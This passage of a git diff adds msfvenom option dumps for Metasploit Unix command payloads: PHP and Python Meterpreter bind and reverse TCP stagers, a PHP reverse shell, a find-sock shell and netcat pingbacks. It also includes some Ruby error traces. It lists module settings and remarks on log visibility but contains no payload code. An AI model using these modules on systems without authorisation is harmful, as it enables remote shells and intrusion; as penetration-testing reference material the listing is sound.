method `shell' for #<#:0x0000007f6cf9c450> (NoMethodError) + from /usr/share/metasploit-framework/modules/payloads/singles/php/exec.rb:47:in `generate' + from /usr/share/metasploit-framework/modules/payloads/adapters/cmd/unix/php.rb:34:in `generate' + from /usr/share/metasploit-framework/lib/msf/core/payload.rb:195:in `size' + from /usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:500:in `dump_payload_module' + from /usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:26:in `dump_module' + from /usr/bin/msfvenom:461:in `
' diff --git a/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..3dfc360 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp.txt @@ -0,0 +1,58 @@ + + Name: PHP Exec, PHP Meterpreter, Bind TCP Stager + Module: payload/cmd/unix/php/meterpreter/bind_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 862 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in PHP. + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_ipv6.txt b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_ipv6.txt new file mode 100644 index 0000000..8b9c1bf --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_ipv6.txt @@ -0,0 +1,58 @@ + + Name: PHP Exec, PHP Meterpreter, Bind TCP Stager IPv6 + Module: payload/cmd/unix/php/meterpreter/bind_tcp_ipv6 + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 856 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in PHP. + + Listen for a connection over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_ipv6_uuid.txt b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_ipv6_uuid.txt new file mode 100644 index 0000000..eddc1db --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_ipv6_uuid.txt @@ -0,0 +1,59 @@ + + Name: PHP Exec, PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support + Module: payload/cmd/unix/php/meterpreter/bind_tcp_ipv6_uuid + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 856 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in PHP. + + Listen for a connection over IPv6 with UUID Support + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_uuid.txt new file mode 100644 index 0000000..c280bc7 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_uuid.txt @@ -0,0 +1,59 @@ + + Name: PHP Exec, PHP Meterpreter, Bind TCP Stager with UUID Support + Module: payload/cmd/unix/php/meterpreter/bind_tcp_uuid + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 858 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in PHP. + + Listen for a connection with UUID Support + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-unix-php-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..9e8fdf5 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-meterpreter-reverse_tcp.txt @@ -0,0 +1,65 @@ + + Name: PHP Exec, PHP Meterpreter, PHP Reverse TCP Stager + Module: payload/cmd/unix/php/meterpreter/reverse_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 825 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in PHP. + + Reverse PHP connect back stager with checks for disabled functions + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-meterpreter-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-unix-php-meterpreter-reverse_tcp_uuid.txt new file mode 100644 index 0000000..a150099 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-meterpreter-reverse_tcp_uuid.txt @@ -0,0 +1,66 @@ + + Name: PHP Exec, PHP Meterpreter, PHP Reverse TCP Stager + Module: payload/cmd/unix/php/meterpreter/reverse_tcp_uuid + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 820 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in PHP. + + Reverse PHP connect back stager with checks for disabled functions + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-unix-php-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..5c774da --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-meterpreter_reverse_tcp.txt @@ -0,0 +1,55 @@ + + Name: PHP Exec + Module: payload/cmd/unix/php/meterpreter_reverse_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 10989 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-reverse_php.txt b/msfvenom/payload_options/cmd-unix-php-reverse_php.txt new file mode 100644 index 0000000..c990b8d --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-reverse_php.txt @@ -0,0 +1,42 @@ + + Name: PHP Exec, PHP Command Shell, Reverse TCP (via PHP) + Module: payload/cmd/unix/php/reverse_php + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 1342 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Reverse PHP connect back shell with checks for disabled functions + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-shell_findsock.txt b/msfvenom/payload_options/cmd-unix-php-shell_findsock.txt new file mode 100644 index 0000000..39976c5 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-shell_findsock.txt @@ -0,0 +1,40 @@ + + Name: PHP Exec, PHP Command Shell, Find Sock + Module: payload/cmd/unix/php/shell_findsock + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 1102 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Spawn a shell on the established connection to + the webserver. Unfortunately, this payload + can leave conspicuous evil-looking entries in the + apache error logs, so it is probably a good idea + to use a bind or reverse shell unless firewalls + prevent them from working. The issue this + payload takes advantage of (CLOEXEC flag not set + on sockets) appears to have been patched on the + Ubuntu version of Apache and may not work on + other Debian-based distributions. Only tested on + Apache but it might work on other web servers + that leak file descriptors to child processes. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-pingback_bind.txt b/msfvenom/payload_options/cmd-unix-pingback_bind.txt new file mode 100644 index 0000000..24afd87 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-pingback_bind.txt @@ -0,0 +1,30 @@ + + Name: Unix Command Shell, Pingback Bind TCP (via netcat) + Module: payload/cmd/unix/pingback_bind + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 103 + Rank: Normal + +Provided by: + asoto-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Accept a connection, send a UUID, then exit + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + NetcatPath nc yes The path to the Netcat executable + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-pingback_reverse.txt b/msfvenom/payload_options/cmd-unix-pingback_reverse.txt new file mode 100644 index 0000000..3608983 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-pingback_reverse.txt @@ -0,0 +1,37 @@ + + Name: Unix Command Shell, Pingback Reverse TCP (via netcat) + Module: payload/cmd/unix/pingback_reverse + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 84 + Rank: Normal + +Provided by: + asoto-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates a socket, send a UUID, then exit + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + NetcatPath nc yes The path to the Netcat executable + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-exec.txt b/msfvenom/payload_options/cmd-unix-python-exec.txt new file mode 100644 index 0000000..8d378c3 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-exec.txt @@ -0,0 +1,10 @@ +Options for payload/cmd/unix/python/exec: +========================= + +/usr/share/metasploit-framework/modules/payloads/singles/python/exec.rb:39:in `command_string': undefined method `include?' for nil (NoMethodError) + from /usr/share/metasploit-framework/modules/payloads/singles/python/exec.rb:32:in `generate' + from /usr/share/metasploit-framework/modules/payloads/adapters/cmd/unix/python.rb:34:in `generate' + from /usr/share/metasploit-framework/lib/msf/core/payload.rb:195:in `size' + from /usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:500:in `dump_payload_module' + from /usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:26:in `dump_module' + from /usr/bin/msfvenom:461:in `
' diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..d601db6 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter-bind_tcp.txt @@ -0,0 +1,60 @@ + + Name: Python Exec, Python Meterpreter, Python Bind TCP Stager + Module: payload/cmd/unix/python/meterpreter/bind_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 482 + Rank: Normal + +Provided by: + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter-bind_tcp_uuid.txt new file mode 100644 index 0000000..5eed562 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter-bind_tcp_uuid.txt @@ -0,0 +1,61 @@ + + Name: Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support + Module: payload/cmd/unix/python/meterpreter/bind_tcp_uuid + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 545 + Rank: Normal + +Provided by: + Spencer McIntyre + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a Python payload as an OS command from a Posix-compatible 